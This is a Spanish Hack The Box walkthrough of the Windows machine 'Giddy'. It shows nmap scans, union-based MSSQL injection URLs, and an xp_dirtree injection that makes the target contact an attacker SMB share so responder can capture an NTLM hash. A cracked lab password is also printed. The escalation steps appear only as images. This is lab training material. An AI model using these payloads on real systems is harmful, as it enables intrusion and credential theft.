$

Giddy

2025-03-27 · #ctf#hackthebox#active-directory#windows

Giddy
Sistema operativo Dificultad Fecha de Lanzamiento Creador
Windows Medium 08 Setiembre 2018 lkys37en

Reconocimiento

Lanzamos una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.

giddy

Enumeración inicial

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima. 

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.104                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 19:45 -03
Initiating SYN Stealth Scan at 19:45
Scanning 10.10.10.104 [65535 ports]
Discovered open port 3389/tcp on 10.10.10.104
Discovered open port 80/tcp on 10.10.10.104
Discovered open port 443/tcp on 10.10.10.104
Completed SYN Stealth Scan at 19:46, 27.08s elapsed (65535 total ports)
Nmap scan report for 10.10.10.104
Host is up, received user-set (0.28s latency).
Scanned at 2025-03-27 19:45:32 -03 for 28s
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       REASON
80/tcp   open  http          syn-ack ttl 127
443/tcp  open  https         syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.14 seconds
           Raw packets sent: 131084 (5.768MB) | Rcvd: 108 (21.256KB)

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.

nmap -sCV -p80,443,3389 -oN servicesScan 10.10.10.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 19:46 -03
Nmap scan report for 10.10.10.104 (10.10.10.104)
Host is up (0.15s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_ssl-date: 2025-03-27T22:49:19+00:00; +2m19s from scanner time.
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2025-03-26T22:37:46
|_Not valid after:  2025-09-25T22:37:46
| rdp-ntlm-info: 
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
|   Product_Version: 10.0.14393
|_  System_Time: 2025-03-27T22:49:13+00:00
|_ssl-date: 2025-03-27T22:49:19+00:00; +2m19s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2m18s, deviation: 0s, median: 2m18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.69 seconds

Explotación inicial

HTTP (80) - HTTPS (443)

giddy

giddy

giddy

SQL Injection

giddy

El motor de base de datos es SQL Server (MSSQL)

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),2,4,5,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1--%20-

El nombre de la base de datos en uso es Injection.

giddy

SQL Injection basada en uniones.

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),name,4,5,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1%20FROM%20master..sysdatabases--%20-

Base de datos.

SELECT name FROM master..sysdatabases

Tablas.

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),name,4,5,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1%20FROM%20Injection..sysobjects%20WHERE%20xtype=%27U%27--%20-

SELECT name FROM Injection..sysobjects WHERE xtype = 'U'

giddy

Columnas

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),name,4,5,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1%20FROM%20syscolumns%20WHERE%20id%20=%20(SELECT%20id%20FROM%20sysobjects%20WHERE%20name%20=%20%27Users%27)--%20-

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')

giddy

Data

SELECT  UserId, UserName from Users

giddy

Esto no nos lleva a nada, por lo que intetaremos ejecutar comandos.

Ejecutamos el siguiente comando:

EXEC master.sys.xp_dirtree \\10.10.14.32\share--

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100;%20exec%20master.sys.xp_dirtree%20%27\\10.10.14.32\share%27--

Nos ponemos en escucha con responder

reponder -I tun0

Obtenemos el hash NTLM del usuario Stacy.

giddy

giddy

stacy:xNnWo6272k7x

Utilizamos estas credenciales para iniciar sesión en el panel de Windows PowerShell Web Access

giddy

giddy

Leemos el flag de user.txt

giddy

Elevación de privilegios

giddy

giddy

giddy

giddy

giddy

Post Explotación

Leemos la flag de root.

giddy